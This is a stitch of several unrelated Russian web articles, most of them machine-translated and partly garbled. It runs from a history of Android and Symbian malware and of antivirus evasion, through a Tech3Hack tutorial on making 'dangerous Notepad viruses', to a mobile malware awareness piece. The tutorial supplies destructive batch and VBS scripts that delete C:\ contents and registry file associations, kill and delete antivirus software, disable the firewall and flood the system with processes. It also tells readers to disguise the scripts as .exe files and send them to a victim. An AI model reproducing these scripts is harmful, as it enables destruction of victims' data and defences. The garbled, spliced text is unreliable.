Во время запуска приложение создавало каталог /data/data/com.android.bot/files, в котором размещало три файла: header01.png, footer01.png, border01.png, а затем ставило на них бит исполнения и запускало первый файл — эксплойт Gingerbreak для получения прав root на устройстве. Если была установлена уже рутованная прошивка, приложение пыталось получить права root штатными средствами, в результате чего у пользователя запрашивалось предоставление повышенных привилегий (тот случай, когда рутованный смартфон безопаснее залоченного).

В случае успешного получения прав root любым из двух способов запускался второй файл, в котором хранился SMS-троян — модификация известного трояна Foncy SMS. Троян определял принадлежность SIM-карты стране и начинал отправку сообщений на короткий платный номер, блокируя все ответные сообщения. Следующим запускался файл border01.png, в котором был код IRC-бота. Он подключался к IRC-серверу с IP-адресом 199.68.. и регистрировался на канале #andros под случайным ником. Все сообщения, отправленные боту, выполнялись в консоли как обычные Linux-команды.

Согласно заявлению сотрудников «Лаборатории Касперского», это было первое приложение такого класса для Android. Однако, по их мнению, опасность его была невелика, так как распространялся он только через серые маркеты, а эксплойт работал только в ранних версиях Android 2.3.

 

Первый полиморфный троян

В феврале 2012-го компания Symantec сообщила, что обнаружила первый полиморфный троян для платформы Android, который на тот момент не мог быть найден ни одним мобильным антивирусом, кроме ее собственного (сюрприз). Троян, названный Android.Opfake, распространялся через различные веб-сайты, находившиеся преимущественно на территории России и стран СНГ, в виде бесплатной версии популярного приложения или игры.

Полиморфным он был только условно, так как изменение трояна происходило на стороне сервера. При каждой новой загрузке файла содержимое APK-файла изменялось с помощью различных методов, таких как модификация файлов данных, включение в пакет приложения «мусорных файлов», а также изменение имен файлов. Все это затрудняло обнаружение мобильными антивирусами, которые в то время использовали примитивные техники идентификации, типа сверки контрольных сумм и проверки на наличие специфических файлов в пакете.

После попадания на смартфон жертвы и запуска троян извлекал из файла res/raw/data.db(который существовал в любой версии трояна) список операторов связи и платных коротких номеров и начинал отправку SMS. В дополнение троян открывал в браузере веб-страницу, содержащую ссылки на другое вредоносное ПО. Интересно, что сообщения также изменялись при каждой новой мутации трояна, в результате чего было невозможно блокировать определенные типы сообщений на стороне оператора.

Различия в контрольных суммах файлов пакета с трояном, скачанных в разное время

 

Вирус-матрешка

Неделей раньше, а именно 1 февраля 2012 года, на сайте Виктор Чебушев опубликовал заметку, посвященную обнаружению нового типа вируса, распространяемого через магазин Google Play. Вирус маскировался под приложение Superclean, способное, по словам разработчиков, очистить память устройства и таким образом поднять производительность смартфона или планшета. На тот момент приложение имело уже от 1000 до 5000 установок и хороший рейтинг в 4,5 звезды.

Как выяснилось, Superclean действительно выполнял очистку памяти, но делал это простым перезапуском всех фоновых приложений с помощью всего пяти строк на языке Java. На этой «сложной» задаче полезное действие приложения заканчивалось, а самое интересное начиналось дальше. Анализируя код, сотрудник «Лаборатории Касперского» обнаружил, что при запуске приложение соединялось с удаленным сервером и загружало на карту памяти три файла: autorun.inf, folder.ico и svchosts.exe.

Первые два автоматически превращали подключаемый к USB-порту компа смартфон в самозагружаемую флешку, с которой запускался файл svchosts.exe. Сам svchosts.exe на поверку оказался бэкдором Backdoor.MSIL.Ssucl.a, который слушает микрофон компьютера и отправляет все полученные с его помощью данные на удаленный сервер.

Страница приложения Superclean. Обрати внимание на рейтинг

Отличительной чертой трояна был также самый внушительный на тот момент набор функциональности из всех мобильных зловредов для Android. По команде от оператора он мог отправлять сообщения без ведома пользователя, включать и выключать Wi-Fi, собирать информацию об устройстве, открывать произвольные ссылки в браузере, отправлять на удаленный сервер содержимое SD-карты, SMS-переписку и выполнять многие другие операции.

Все, что выводит Superclean на экран

 

Очередной ответ Google, или принудительная проверка всех приложений

К концу 2012 года ситуация с зловредами для Android стала уже настолько накаленной, что Google решила пойти на очередной кардинальный шаг. В сентябре без лишней огласки был приобретен сервис онлайн-проверки приложений на вирусы VirusTotal, а 29 октября выпущена версия Android 4.2, одним из новшеств которой стала автоматическая проверка любого устанавливаемого не через Google Play приложения на вирусы через удаленный сервис.

Трудно сказать, использовала ли Google купленный VirusTotal для этой задачи, или у них есть собственный сервис проверки, однако не нужно быть сотрудником Google, чтобы понять, что VirusTotal так или иначе был использован для защиты Android от вирусов.

 

А как же другие мобильные ОС?

Настоящая история мобильных вирусов началась задолго до появления Android — в те времена, когда на рынке господствовали Symbian и Windows CE. Еще в 2004 году хакерская команда 29A продемонстрировала пример червя для Symbian Series 60, названного впоследствии Cabir (Worm.SymbOS.Cabir). Червь распространялся через Bluetooth и не совершал никаких зловредных действий, только демонстрировал сообщение «Caribe» после включения смартфона. Участники 29A разослали вирус ведущим антивирусным компаниям как пример, а затем опубликовали его исходный код, из-за чего впоследствии появилось несколько модификаций червя, на этот раз найденных «в дикой природе».

Затем был обнаружен первый вирус для систем на базе Windows CE под названием Virus.WinCE.Duts. Он поражал PocketPC 2000, PocketPC 2002, PocketPC 2003, не умел распространяться через Bluetooth или MMS, но инфицировал все найденные приложения на самом устройстве. Как и Cabir, он был детищем 29A и также был создан для демонстрации возможности существования подобного рода зловредов.

Спустя месяц для Windows CE был обнаружен первый бэкдор: Backdoor.WinCE.Brador. После запуска зловред прописывался в автозагрузку, а затем открывал сетевой порт и ожидал удаленные подключения. Бэкдор поддерживал такие команды, как получение списка файлов на устройстве, загрузка файла, показ SMS-сообщений, получение файла с устройства и выполнение определенной команды.

Практически сразу после Brador был найден и первый SM-троян, в этот раз для Symbian. Он распространялся в составе простой игры Mosquitos, в честь которой и получил свое имя — Trojan.SymbOS.Mosquit.a. После запуска он начинал рассылку сообщений на премиум-номера. Работоспособность игры при этом полностью сохранялась, а ее титульный экран был украшен сообщением о том, что игра была крякнута неким SODDOM BIN LOADER.

Впоследствии количество известных вирусов начало стремительно возрастать, и многие из них использовали многочисленные уязвимости в Symbian. Например, Trojan.SymbOS.Locknut, получивший известность в России как Govno, использовал некорректную проверку исполняемых файлов, чтобы блокировать работу всей ОС. Trojan.SymbOS.Fontal заменял системные шрифты на модифицированные версии, из-за чего ОС также отказывалась загружаться. Trojan.SymbOS.Dampig и Trojan.SymbOS.Hoblle подменяли системные приложения, а Trojan.SymbOS.Drever был способен блокировать работу антивирусных приложений.

После того как на сцене появилась iOS, некоторые вирусописатели попытались переключиться на нее. Однако из-за параноидальной закрытости API ОС и невозможности установить приложения из сторонних источников эпидемии не произошло. Немногочисленные вирусы были ориентированы на взломанные устройства и в основном выводили на экран различные рекламные и фишинговые сообщения. Наиболее примечательным стало разве что появление трояна в самом App Store. Приложение под названием Find and call, обладая функционалом VoIP-клиента, при этом совершало такие действия, как копирование контактов на удаленный сервер и рассылка спама (на русском языке, кстати).

 

Самый продвинутый троян

В июне этого года сотрудники «Лаборатории Касперского» обнаружили наиболее сложный и продвинутый в техническом плане троян для Android из всех, что встречались до этого. Троян получил имя Backdoor.AndroidOS.Obad.a. Это было независимое приложение, не внедряемое в легитимный софт и, судя по всему, распространяемое под видом известных приложений.

После соглашения пользователя с длинным списком полномочий, установки и запуска он запрашивал права администратора устройства (речь идет не о root, а о собственной системе безопасности Android), которые были нужны только для двух вещей: самостоятельной блокировки экрана и защиты от удаления. Последнее троян делал особенно изысканно. Используя ранее неизвестный баг в Android, он удалял себя из списка приложений с полномочиями администратора, из-за чего его невозможно было лишить этих прав и, как следствие, удалить.

Далее троян проверял в системе наличие прав root и при следующем подключении к Wi-Fi-сети отправлял информацию об устройстве на удаленный сервер. Информация была типична для такого рода приложений и содержала в себе номер телефона, IMEI, MAC-адреса и подобную информацию. В ответ он получал список команд для исполнения и заносил их в базу данных с пометкой о времени исполнения. Удаленными командами могли быть: проверка баланса, отправка сообщений, переход в режим проксирования трафика, скачивание и установка приложений, отправка файлов по Bluetooth, открытие шелла и другие. Плюс ко всему при каждом подключении к другому устройству по синему зубу он копировал сам себя на это устройство.

При попытке анализа кода трояна обнаружилось использование множества техник защиты от анализа. Во-первых, троян эксплуатировал неизвестный ранее баг в утилите dex2jar, из-за которого декомпиляция кода трояна происходила некорректно. Во-вторых, троян использовал еще один неизвестный баг в Android, позволяющий создать файл Manifest.xml, в котором содержится метаинформация о приложении, таким образом, чтобы он противоречил стандартам Google, но при этом корректно обрабатывался при запуске приложения. Из-за этого многие инструменты анализа просто не срабатывали.

Backdoor.AndroidOS.Obad.a требует множество полномочий для работы

Если же удавалось распаковать и декомпилировать код трояна, обойдя эти ограничения, то дальше приходилось иметь дело с многоуровневой системой шифрования, которая защищала от анализа все текстовые данные, а также имена методов (они тоже были строками и вызывались посредством рефлексии). Интересно, что ключом для первого слоя шифрования была строка с главной страницы facebook.com, из-за чего работу трояна невозможно было проанализировать в «стерильной комнате», без подключения к интернету (хотя ограничение, конечно, можно обойти с помощью прокси).

А плюс ко всему еще и запрашивает права администратора

 

INFO

В качестве одного из методов полиморфизма в найденном Symantec трояне использовалась включаемая в разные файлы фотография того самого Свидетеля из Фрязино.

 

WWW

  • Доклад с конференции DEF CON 18, посвященный первому серьезному руткиту для Android: goo.gl/WM0tBz
  • То самое сообщение на reddit об обнаружении трояна DroidDream: goo.gl/MnTcb

 

Выводы

Количество вирусов для Android сегодня исчисляется тысячами, и некоторые из них действительно представляют интерес для исследователя как образцы хорошего программирования и знания архитектуры Android. Вот только бояться их не стоит. Автор данной статьи уже более шести лет использует смартфоны на Android без всяких антивирусов и ни разу не поймал на них заразу. Главное — читать полномочия приложений и ставить их только из маркета.

 

Вирусы для Android. Способы заражения.

  • Открытым кодом. Всегда можно посмотреть, как работает та или иная системная утилита.
  • Распространенностью. Обновления безопасности поступают на разные модели устройств в разное время, многие вообще остаются без обновлений, что позволяет беспрепятственно использовать весьма несвежие уязвимости.
  • Несовершенством антивирусных программ. Сколько бы процессоров ни было в устройстве, антивирусы все равно значительно замедляют работу ОС, поэтому пользователи неохотно их ставят.
  • Слабой системой проверки приложений в маркете. Несмотря на все уверения специалистов Google о «многоступенчатой проверке», в маркет легко проникают клоны удаленных инфицированных программ, а к разработчикам таких программ не применяются никакие меры.
  • Отсутствием централизованного контроля за прошивками. Разработчик прошивки может беспрепятственно вставлять любой шпионский софт по своему усмотрению.

ОБХОД АНТИВИРУСНЫХ СКАНЕРОВ

Времена свободного доступа любого приложения в Play Market подходят к концу. Ребята из Google сообразили, что надо принимать хоть какие-то меры, чтобы остановить нашествие огромного количества вирусов, и ввели систему проверки приложений. Создатели вирусов мгновенно отреагировали и начали вставлять механизмы обхода проверки.

[ad name=»Responbl»]

Один из интересных методов — отложенный старт вредоносной активности. Например, приложение месяц ведет себя как обычная игрушка или справочник, тысячи пользователей скачивают его и оставляют восторженные отзывы, привлекая все большую аудиторию. А через некоторое время в приложении вдруг просыпается зло, и оно начинает показывать фейковые диалоги, скачивать и устанавливать нежелательный софт.

Другие вирусы, такие как семейство Leech, определяют свой IP-адрес в сети и, если он попадает в IP-диапазон, используемый Google, или же имя хоста айпишника содержит слова google, android, 1e100, сразу же прекращают работу, чтобы не вызывать подозрений у системы автоматической проверки. Причем делают они это по-хитрому, ведь если использовать стандартные средства Android, то придется запрашивать у пользователя дополнительные разрешения. Поэтому злоумышленники обращают свой взор на такие ресурсы, как ipinfo.io. Не составит труда загрузить страничку в строку и найти там нужную информацию:


Развиваются и методы обхода статического анализа кода. Один из способов — использовать динамическую загрузку библиотек с вредоносной нагрузкой. В результате само приложение выглядит вполне невинно. Для загрузки внешнего кода используется класс DexClassLoader, который умеет загружать классы из JARили APK-файлов в формате DEX.


После загрузки класса можно спокойно дергать его методы с помощью рефлексии. Внешнюю библиотеку можно как разместить в самом APK, так и скачать из Сети после установки. Чтобы еще больше усложнить обнаружение вредоносного кода, злоумышленники шифруют такие программные модули и дают им трудноугадываемые имена.

Некоторые вирусописатели идут дальше и выкладывают в маркет приложения, которые после установки скачивают и устанавливают вирусные аппликухи самостоятельно, маскируя их под системные утилиты. Так что, даже если пользователь удалит изначальное приложение, вирус будет преспокойно обитать на устройстве и дальше. Такой подход реализован, например, в приложении BrainTest.

Для установки новых приложений без ведома пользователя злоумышленники используют утилиту pm:

Чтобы использовать эту утилиту, приложение должно либо запрашивать разрешение android.permission.INSTALL_PACKAGES в манифесте, либо обладать правами рута. Проверить, установлено ли приложение, можно, воспользовавшись методом getPackageInfo класса PackageManager:


СПОСОБЫ ОБОГАЩЕНИЯ НА ВИРУСАХ ДЛЯ АНДРОИД

Самый простой способ нажиться на бедных пользователях — заставить их просматривать рекламу. Например, приложение Who Viewed Me on Instagram обещает показать пользователю его тайных поклонников в инстаграме, а вместо этого ворует учетные данные и размещает кучу рекламы в профиле пользователя. Приложение использует возможность вызова методов Android-приложения из JavaScript-кода. Чтобы украсть учетную запись пользователя, вредонос просит пользователя залогиниться в своем окне с WebView, а после загрузки логин-страницы инстаграма добавляет кусочек своего кода к кнопке входа.

Объявляем метод, который будет принимать учетную запись из JavaScript:


Следует отметить, что после удаления одной версии программы автор сразу же разместил аналогичную, лишь слегка изменив название. И она спокойно прошла контроль со стороны Play маркета! Похоже, что Большой Брат не так уж пристально следит за разработчиками.

Между прочим, количество загрузок у подобных «полезных приложений» иногда переваливает за 100 тысяч! Так что, если приложение просит тебя залогиниться в соцсеть в своем окне, самое время насторожиться и вспомнить, что конкретно тебе известно об этом приложении.

[ad name=»Responbl»]

Другой набирающий популярность способ обогащения — вирусы-вымогатели. Попав на устройство, они получают права рута, часто шифруют пользовательские данные и показывают окно с требованием выкупа, предотвращая попытки пользователя запустить другие приложения. Так ведут себя, к примеру, вирусы семейства Fusob.

Первоочередная задача программы-вымогателя — получить рут на устройстве жертвы. К сожалению простых пользователей, в Сети гуляет бесчисленное множество эксплоитов, позволяющих незаметно повысить права приложения до суперпользовательских. Например, Towelroot постоянно обновляется и совершенствуется своим создателем. Неплохую базу эксплоитов собрала группа Offensive Security, ну и конечно, все самые свежие уязвимости можно посмотреть на CVE.

Получив рут, зловред с помощью класса ActivityManager начинает контролировать работу других приложений, убивая нежелательные:

Нередко для управления вирусом-вымогателем используется GCM — ребята из Google разработали идеальную систему для отправки команд приложению и получения от него ответов. Достаточно зарегистрироваться на сервере, предварительно получив токен для работы.

Теперь можно принимать любые команды, в том числе на обновление вируса, что дает злоумышленнику практически неограниченную власть.


Есть и более безобидные способы обогащения. Например, популярное приложение «Фонарик» втихаря собирало данные о месторасположении пользователей, которые разработчик потом продавал рекламщикам для таргетирования рекламы.

ВЫВОДЫ

В этой статье мы разобрали все ключевые моменты кода, которые позволяют современной малвари реализовывать зловредные идеи своих плохих авторов. Обладающему этими знаниями программисту бояться нечего :), а что же делать простому пользователю? Если не хочется устанавливать кучу антивирусного софта на девайс, всегда можно скачать APK перед установкой и проверить его на наличие вирусов онлайн-утилитами, например тем же Вирустоталом. Ими же могут воспользоваться разработчики, чтобы удостовериться, что их новое приложение не будет принято за вирус.

Как создать опасный вирус для блокнота [10+ кодов] - Tech3Hack

Вы когда-нибудь думали о создании компьютерного вируса самостоятельно? Не о чем беспокоиться, вот полное руководство, которое расскажет вам, как шаг за шагом создать простой, но опасный вирус для блокнота, с объяснением! 😎


Как вы все знаете, вирус - это не что иное, как вредоносная программа, которая проникает в систему без разрешения и влияет на данные и работу операционной системы. Вирусы выполняют нежелательные задачи, такие как репликация самих себя, повреждая файлы пользователей и т. Д., Поэтому, по сути, мы собираемся создать несколько нежелательных скриптов, которые мы можем выполнить, чтобы разрушить или сломать систему.

Если вы предпочитаете видеоуроки с сообщениями на Tech3Hack, нажмите «Подписаться» ниже:

Также подпишитесь на мгновенную техническую дозу:

Подробнее:

Создать исполняемый файл вируса для блокнота (.exe) с помощью пакетного сценария

Прежде всего, что такое пакетный сценарий, тем, кто не знает, взгляните ниже:

«Это просто текстовый файл, содержащий серию команд, которые выполняются автоматически, строка за строкой, когда командный файл запускается.”

Используя пакетный файл, вы можете создать чрезвычайно опасный вирус, который может удалять файлы Windows, форматировать различные диски [C: \, E:], красть файлы данных и информацию, отключать антивирус, брандмауэр и т. Д.

ПРИМЕЧАНИЕ: Этот пост предназначен исключительно и в основном для образовательных целей. Я нигде не несу ответственности за любой ущерб, причиненный этим руководством, для получения дополнительной информации прочтите наш отказ от ответственности.

Напишите опасный вирус в Блокноте / текстовом редакторе

Готовы ли вы создать свой первый вирус DIY Notepad, давайте приступим к делу,

Прежде всего, вам, очевидно, нужен ПК с Windows.😉

Для этого руководства по созданию простого вируса для блокнота вам не нужно быть закоренелым программистом или кем-то в этом роде, но базовые знания блок-схем и циклов очень помогут вам понять, что здесь происходит. Итак, давайте приступим к созданию троянского вируса с помощью блокнота для запуска из командной строки (cmd) в Windows 10, 8 / 8.1, 7 или XP.

Теперь откройте приложение «Блокнот» и скопируйте (Ctrl + C) и вставьте (Ctrl + V) коды, приведенные ниже, один за другим для разных вирусов в другой файл.

Скопируйте (Ctrl + C) и вставьте (Ctrl + V) исходный код

Примечание : Я не несу ответственности за сообщения о повреждениях или ошибках на вашем ПК, делайте это на свой страх и риск.

Предупреждение: Не пытайтесь использовать это на своем повседневном рабочем компьютере.

Вы читали мои предыдущие посты, будет здорово посмотреть;

Исходные коды Notepad Virus приведены ниже:

1. Отключить Интернет навсегда

Этот код навсегда отключит подключение к Интернету.

 эхо @ эхо выкл> c: windowswimn32.bat эхо прервано> c: windowswimn32.bat echo ipconfig / release_all> c: windowswimn32.bat echo end> ​​c: windowswimn32.batreg добавить hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun / v WINDOWsAPI / t reg_sz / d c: windowswimn32.bat / freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun / v CONTROLexit / t reg_sz / d c: windowswimn32.bat / fecho Вас взломали! ПАУЗА 

2. Удалить ключевые файлы реестра

Это приведет к удалению ключевых файлов реестра, а затем зациклится сообщение

Это опасный и невосстановимый вирус Блокнота.

 @ECHO OFF НАЧАТЬ reg удалить HKCR / .exe НАЧАТЬ reg удалить HKCR / .dll НАЧАТЬ reg удалить HKCR / * :СООБЩЕНИЕ ECHO Ваш компьютер разбился. Ваш папа. НАЙТИ СООБЩЕНИЕ 

3. Бесконечные блокноты

При этом будут появляться бесконечные блокноты, пока компьютер не зависнет и не выйдет из строя

 @ECHO off :Топ ЗАПУСК% SystemRoot% \ system32 \ notepad.exe GOTO top 

4. Извлечение дисководов компакт-дисков

Это заставит дисководы компакт-дисков постоянно выдвигаться

 Установите oWMP = CreateObject (”WMPlayer.OCX.7 ″) Установите colCDROMs = oWMP.cdromCollection делать если colCDROMs.Count> = 1, то Для i = 0 в colCDROMs.Count - 1 colCDROMs.Item (i) .Eject следующий Для i = 0 в colCDROMs.Count - 1 colCDROMs.Item (i) .Eject следующий Конец, если wscript.sleep 100 loop 

5. Бесконечный ввод

Это заставит кнопку ввода постоянно нажимать

 Set wshShell = wscript.CreateObject ("WScript.Shell") делать wscript.sleep 100 wshshell.sendkeys «~ (ввод)» петля 

6.Application Bomber

Он начнет многократно открывать различные приложения, что повлияет на производительность системы.

Вы также можете добавить приложение по вашему выбору в приведенный выше код.

 @ эхо выкл. :Икс начать winword запустить mspaint запустить блокнот начать писать запустить cmd начать исследователь управление запуском начать расчет goto x 

7.Folder Flooder

Это создаст неограниченное количество файлов. папок.

 @ эхо выкл. :Икс md% random% / папка.goto x 

8. Flooder учетной записи пользователя

Это создаст большой номер. учетной записи пользователя на своем ПК и переходит на

 @echo off : xnet пользователь% random% / добавить goto x 

9.Process Creator

Это создаст неограниченное количество фоновых процессов

% 0 |% 0 

10.Windows Hacker

Это удалит весь ваш диск C: \, и его невозможно восстановить

 @Echo off Del C: \ *. * | Y 

10+. Anti Virus Disabler

Этот большой код отключает любой антивирус, установленный в системе

 @ echo off rem rem навсегда убить антивирус net stop «Центр безопасности» брандмауэр netsh установить режим opmode = отключить tskill / A ср * tskill / Пожар * tskill / A анти * cls tskill / шпион * tskill / Булгард tskill / A PersFw tskill / A KAV * tskill / ЗОНАЛЬНАЯ СИГНАЛИЗАЦИЯ tskill / A SAFEWEB cls tskill / шпион * tskill / Булгард tskill / A PersFw tskill / A KAV * tskill / ЗОНАЛЬНАЯ СИГНАЛИЗАЦИЯ tskill / A SAFEWEB cls tskill / А ВЫХОД tskill / A nv * tskill / навигация * tskill / A F- * tskill / A ESAFE tskill / A cle cls tskill / A BLACKICE tskill / A def * tskill / A kav tskill / Кав * tskill / A в среднем * tskill / A ясень * cls tskill / A aswupdsv tskill / Эвид * tskill / Охранник * tskill / А гуар * tskill / A gcasDt * tskill / MSMP * cls tskill / A mcafe * tskill / A mghtml tskill / A msiexec tskill / Аванпост tskill / A isafe tskill / A zap * cls tskill / Зауинст tskill / A upd * tskill / A zlclien * tskill / Минилог tskill / A cc * tskill / A norton * cls tskill / A norton au * tskill / A ccc * tskill / НПФМН * tskill / Лодж * tskill / A nisum * tskill / A issvc tskill / A tmp * cls tskill / A tmn * tskill / A pcc * tskill / A cpd * tskill / Поп * tskill / Пав * tskill / A padmincls tskill / панда * тскилл / А авщ * tskill / A sche * tskill / Симан * tskill / вирус * tskill / Царство * cls tskill / развертка * tskill / сканирование * tskill / A ad- * tskill / Сейф * tskill / A avas * tskill / Норма * cls tskill / A offg * del / Q / F C: \ Program Files \ alwils ~ 1 \ avast4 \ *.* del / Q / F C: \ Program Files \ Lavasoft \ Ad-awa ~ 1 \ *. exe del / Q / F C: \ Program Files \ kasper ~ 1 \ *. exe cls del / Q / F C: \ Program Files \ trojan ~ 1 \ *. exe del / Q / F C: \ Program Files \ f-prot95 \ *. dll del / Q / F C: \ Program Files \ tbav \ *. datcls del / Q / F C: \ Program Files \ avpersonal \ *. vdf del / Q / F C: \ Program Files \ Norton ~ 1 \ *. cnt del / Q / F C: \ Program Files \ Mcafee \ *. * cls del / Q / F C: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ *. * del / Q / F C: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ *. * del / Q / F C: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ *.* del / Q / F C: \ Program Files \ Norton ~ 1 \ *. * cls del / Q / F C: \ Program Files \ avgamsr \ *. exe del / Q / F C: \ Program Files \ avgamsvr \ *. exe del / Q / F C: \ Program Files \ avgemc \ *. exe cls del / Q / F C: \ Program Files \ avgcc \ *. exe del / Q / F C: \ Program Files \ avgupsvc \ *. exe дель / Q / F C: \ Program Files \ grisoft del / Q / F C: \ Program Files \ nood32krn \ *. exe del / Q / F C: \ Program Files \ nood32 \ *. exe cls del / Q / F C: \ Program Files \ nod32 del / Q / F C: \ Program Files \ nood32 del / Q / F C: \ Program Files \ kav \ *. exe del / Q / F C: \ Program Files \ kavmm \ *.Exe del / Q / F C: \ Program Files \ kaspersky \ *. * cls del / Q / F C: \ Program Files \ ewidoctrl \ *. exe del / Q / F C: \ Program Files \ Guard \ *. exe del / Q / F C: \ Program Files \ ewido \ *. exe cls del / Q / F C: \ Program Files \ pavprsrv \ *. exe del / Q / F C: \ Program Files \ pavprot \ *. exe del / Q / F C: \ Program Files \ avengine \ *. exe cls del / Q / F C: \ Program Files \ apvxdwin \ *. exe del / Q / F C: \ Program Files \ webproxy \ *. exe дель / Q / F C: \ Program Files \ панда программного обеспечения\*.* rem 

После копирования-вставки любого из вирусов за раз в Блокноте сохраните файл в режиме ВСЕ ФАЙЛЫ с расширением «.bat “(без кавычек, как показано на изображении).

Сохраните файл в режиме ВСЕ ФАЙЛЫ с расширением «.bat».

ВЫПОЛНЕНО: Вы успешно создали вирус для Блокнота. Вот и все, теперь вы закончили свою работу, теперь вам нужно отправить файл жертве.

Готово, создание командного файла

Недостатком вируса, содержащего пакетный файл, является то, что любой может открыть его с помощью блокнота и легко прочитать команды, а также удалить, если он окажется вредоносным. Итак, чтобы преодолеть это ограничение / недостаток, вы можете использовать инструмент под названием «Пакетный преобразователь в исполняемый файл».Он преобразует расширение « .bat » в расширение « .exe ». Следовательно, ваш командный файл будет преобразован в приложение Windows. Это поможет убедить вашу жертву открыть файл.

Bat2Exe

Загрузите BatToExe для простого преобразования командных файлов в исполняемые файлы, нажав здесь

ПРИМЕЧАНИЕ: Это руководство предназначено только для компьютеров под управлением Windows, эти вирусы не работают на Linux или MAC.

Также читайте:

Завершение работы

Итак, друзья надеются, что вам понравился пост о , как создать вирус блокнота с использованием пакетного сценария , я сделал этот учебник более информативным, попробуйте создать их вирус, если вы столкнетесь с какой-либо проблемой и вам понадобится помощь, не стесняйтесь комментировать, я всегда здесь для вашей помощи и не забудьте поделиться этим постом с друзьями, если вы нашли его полезным и приятным, а также за поддержку меня в будущем в ближайшем будущем.

Если вы предпочитаете видеоуроки с сообщениями на Tech3Hack, то нажмите «Подписаться» ниже:

Также, подпишитесь на мгновенную техническую дозу:

До свидания, и не забудьте подписаться на нашу рассылку, заполнив форму ниже.

Продолжайте посещать, продолжайте учиться.


Статьи по теме


Поделиться сексуально, попробуйте:

Связанные

.

Четыре способа заражения телефонов хакерами вирусами

Нетрудно определить, заражен ли ваш настольный компьютер вредоносным ПО - оно может замедляться, постоянно появляются рекламные объявления или уведомления о том, что вы выиграли приз, он неожиданно вылетает, вентилятор начинает шумно жужжать, а на вашем экране появляются незнакомые значки. рабочий стол. Но знаете ли вы, как проверить наличие вредоносных программ на телефонах Android?

Телефон, зараженный вредоносным ПО, ведет себя немного иначе. У вас может быть поврежденный телефон с вредоносным ПО, скрывающимся в тени, и вы, вероятно, даже не заметите.Нет вентилятора, панели задач, всплывающих окон или других симптомов, свидетельствующих о заражении.
Согласно нашему исследованию, количество вредоносных установочных пакетов вредоносных программ, обнаруженных на мобильных устройствах, более чем утроилось в 2016 году, что привело к почти 40 миллионам атак по всему миру.
Хотя вредоносное ПО для Android гораздо более распространено, это не значит, что вам не следует знать о вредоносном ПО для iOS. Вредоносное ПО поражает обе платформы и может иметь разрушительные последствия для предприятия. ИТ-администраторам важно знать, как избежать вредоносных программ для мобильных устройств и как лучше всего избавиться от вирусов на телефоне.

Как хакеры заражают телефоны вредоносными программами

Киберпреступники, стремящиеся к большей отдаче, сосредотачивают свои усилия на организациях и используют различные тактики для заражения максимального количества корпоративных устройств своими разновидностями вредоносного ПО.

1. Зараженные приложения

Взломанные приложения - наиболее распространенная система доставки, используемая хакерами для передачи вредоносного ПО на устройства пользователей. Операторы вредоносных программ обычно выбирают популярные приложения для переупаковки или заражения, повышая вероятность того, что жертвы загрузят их мошенническую версию.Однако иногда они будут предлагать совершенно новые приложения.
Зараженные приложения обычно находятся в сторонних магазинах приложений. Эти интернет-магазины, как правило, устанавливают свои полосы приема ниже, чем, например, в Google Play или App Store, что упрощает киберпреступникам размещение вредоносных приложений. Однако было несколько случаев обнаружения и удаления вредоносных приложений из официальных магазинов приложений, таких как удаление 250 поддельных приложений для iOS из App Store в 2015 году, но не раньше, чем они были загружены тысячами (а иногда и миллионами). раз невиновными пользователями.

2. Вредоносная реклама

Вредоносная реклама - это практика внедрения вредоносного ПО в законные рекламные сети в Интернете для нацеливания на широкий круг конечных пользователей. Объявления выглядят совершенно нормально и появляются во многих приложениях и на веб-страницах.
Как только пользователь нажимает на объявление, его устройство немедленно заражается вредоносной программой. Например, некоторые более агрессивные вредоносные объявления занимают весь экран устройства, пока пользователь просматривает веб-страницы. Столкнувшись с этой ситуацией, многие пользователи первым делом прикоснутся к экрану и запустят вредоносную загрузку.

3. Мошенничество

Мошенничество - это распространенный инструмент, используемый хакерами для заражения мобильных устройств вредоносным ПО. Они полагаются на перенаправление пользователя на вредоносную веб-страницу либо через веб-перенаправление, либо через всплывающий экран. В более целенаправленных случаях ссылка на зараженную страницу отправляется непосредственно человеку в электронном письме или текстовом сообщении.
Когда пользователь попадает на зараженный сайт, код на странице автоматически запускает загрузку вредоносного ПО. Веб-сайт обычно замаскирован под легальный вид, чтобы пользователи могли принять файл на свои устройства.

4. Напрямую к устройству

Вероятно, самый распространенный метод заражения в стиле Джеймса Бонда, прямой на устройство, требует, чтобы хакер действительно коснулся телефона, чтобы установить вредоносное ПО. Обычно это включает в себя подключение устройства к компьютеру и прямую загрузку на него вредоносного программного обеспечения (также известное как загрузка неопубликованных приложений).
Как бы неправдоподобно это ни звучало, так происходит множество громких атак. Известно, что небольшие группы хакеров проводят чрезвычайно целенаправленные атаки на высокопоставленных лиц, заражая телефоны, когда те оставляют их без присмотра.

Типы мобильных вредоносных программ

В то время как вредоносные программы для Android не достигли того же масштаба, что и вредоносные программы для настольных компьютеров, появляется все больше вредоносных программ для мобильных устройств, предназначенных для атак на функции и уязвимости смартфонов.
Мобильное вредоносное ПО на телефонах Android или любых других устройствах можно разделить не менее чем на семь основных типов. Об этих категориях важно помнить, что многие варианты вредоносного ПО не попадают только в одну из них. Говоря о категории, эксперты имеют в виду основные функции вредоносного ПО.
По мере того, как хакеры становятся более умными, начали появляться варианты вредоносного ПО, и многие теперь выполняют более одной функции.
Вариант, например, может считаться трояном, при этом попадая в категорию программ-вымогателей. Вредоносная программа, которая запускает устройство (вредоносное ПО), также может украсть учетные данные банка (вредоносное ПО для банкиров).
Вот некоторые из наиболее популярных на сегодняшний день типов мобильных вредоносных программ:

  • Рекламное ПО - показывает пользователю частую рекламу в виде всплывающих окон, иногда приводя к непреднамеренному перенаправлению пользователей на веб-страницы или приложения
  • Банковское вредоносное ПО - пытается украсть банковские данные пользователей без их ведома
  • Программа-вымогатель - требует от пользователей денег и взамен обещает освободить файлы или функциональные возможности устройств, находящихся в «заложниках».
  • Укоренение вредоносного ПО - «укореняет» устройство, по сути, разблокирует операционную систему и получает расширенные привилегии
  • Вредоносная программа для SMS - манипулирует устройствами для отправки и перехвата текстовых сообщений, в результате чего взимается плата за SMS.Пользователь обычно не знает об активности
  • Шпионское ПО - отслеживает и записывает информацию о действиях пользователей на их устройствах без их ведома или разрешения
  • Троян - прячется внутри, казалось бы, невинного, законного программного обеспечения

Как удалить вирус с Android

